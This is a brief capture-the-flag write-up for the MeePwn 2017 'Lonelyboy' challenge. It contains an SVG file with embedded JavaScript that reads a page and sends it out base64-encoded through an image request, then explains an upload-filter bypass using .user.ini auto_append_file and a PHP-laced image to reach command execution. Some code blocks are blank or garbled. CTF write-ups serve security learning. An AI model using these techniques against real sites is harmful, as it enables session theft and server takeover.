MeePwn 2017 - Lonelyboy
23 Jul. 2017
2 minute read

Very quick little write-up:

Get a friend account using xss in svg:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "">

<svg version="1.1" baseProfile="full" xmlns="">
  <polygon points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
	var xhr = new XMLHttpRequest();'GET','/home.php?');

	xhr.onload = function () {
		var myImage = new Image(100, 200);
		myImage.src =''+btoa(xhr.responseText);


Now you can upload a small file (20 characters) without any blacklisted keywords (system, exec, `, …) or blacklisted ending (php, .ht*, …). We noticed the header X-Powered-By: PHP-fpm/5.6 so we uploaded a .user.ini file. This is a configuration INI file that works on a per-directory basis.


auto_append_file will automatically parsed the given file after the main file. So we can upload a 20 characters php file called xx. As this is to short for a real shell (is it? usort magic maybe?) we copy an image with php code in it to a shorter name, so we can auto_append include it. This way we do not have to deal with the character limit and keyword blacklist.

xx file will be included:


1.jpg is an image with as a comment:


Now we browse to upload/[md5]/index.php, so that 1.jpg will be copied to 1 and we can update the .user.ini file to point to it. Now we can execute code like this: upload/[md5]index.php?1337=system('ls');

Very interesting php-golf challenge, i had hoped i would find a 20 character full shell so this would work without the pictures. Shortest i could come up with was:


(24 characters) WORK IN PROGRESS!